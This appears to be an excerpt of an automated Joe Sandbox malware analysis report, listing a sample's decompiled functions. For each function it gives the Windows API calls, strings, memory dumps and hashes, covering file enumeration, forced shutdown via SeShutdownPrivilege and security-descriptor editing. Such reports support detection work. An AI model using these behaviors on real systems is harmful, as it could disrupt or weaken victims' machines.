                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                            • API String ID: 2188072990-1173974218
                                                                                                                                                                                                                                                            • Opcode ID: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                                                                                                                                                                                                                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                                                                                                                                                            Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                                                                                                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                                                                                                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                            • API String ID: 999945258-2428617273
                                                                                                                                                                                                                                                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                                                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                                                                                                                                            Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                                                                                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00403623
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Error opening the file, xrefs: 00428231
                                                                                                                                                                                                                                                            • _, xrefs: 0040371C
                                                                                                                                                                                                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                                                                                                                            • Unterminated string, xrefs: 00428348
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                            • API String ID: 3393021363-188983378
                                                                                                                                                                                                                                                            • Opcode ID: 2b9c49d5960d59883a16b439ff828dd4f5dfc1a63bf5bbf98dd09ba4ce453f60
                                                                                                                                                                                                                                                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b9c49d5960d59883a16b439ff828dd4f5dfc1a63bf5bbf98dd09ba4ce453f60
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                                                                                                                            Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                                                                                                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                                                                                                                                            Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                            • API String ID: 2192556992-3457252023
                                                                                                                                                                                                                                                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                                                                                                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                                                                                                                                            Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                                                                                                                            • String ID: %.3d
                                                                                                                                                                                                                                                            • API String ID: 3337348382-986655627
                                                                                                                                                                                                                                                            • Opcode ID: 0a350f2053e11ad4fca078a344001671bc93ed95471b7cb938d1a90ea4cd2050
                                                                                                                                                                                                                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a350f2053e11ad4fca078a344001671bc93ed95471b7cb938d1a90ea4cd2050
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                                                                                                                                            Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                                                                                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                                                                                                                                            Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                                                                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                            • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                                                                                                                                            Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                                                                                                                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                                                                                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                                                                                                                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
